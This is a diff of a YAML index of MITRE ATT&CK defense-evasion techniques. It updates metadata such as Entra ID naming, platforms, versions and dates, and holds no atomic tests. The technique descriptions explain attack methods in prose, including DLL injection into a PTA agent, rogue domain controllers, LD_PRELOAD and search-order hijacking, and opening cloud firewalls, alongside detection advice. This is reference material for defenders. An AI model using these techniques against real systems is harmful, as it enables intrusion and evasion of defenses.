         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -4905,9 +5049,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -5482,7 +5618,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -5694,16 +5833,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -6718,7 +6838,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
